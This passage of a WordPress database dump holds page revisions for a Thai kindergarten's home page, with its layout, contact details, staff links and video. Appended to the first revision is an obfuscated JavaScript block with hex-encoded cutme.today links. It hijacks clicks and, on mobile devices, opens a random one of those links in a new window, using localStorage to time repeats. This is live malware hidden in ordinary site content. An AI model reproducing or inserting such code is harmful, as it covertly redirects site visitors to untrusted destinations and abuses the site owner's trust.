{\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-26 16:24:17','2024-08-26 09:24:17','',19,'http://watprato.ssk.in.th/?p=217',0,'revision','',0),
(218,2,'2024-08-26 16:25:24','2024-08-26 09:25:24','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":3,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_152c5d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_152c5d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1X6Ept6IxYaNET5DErIMExwq1jHu3vOIS/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แบบวัดการรับรู้ EIT 2</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titl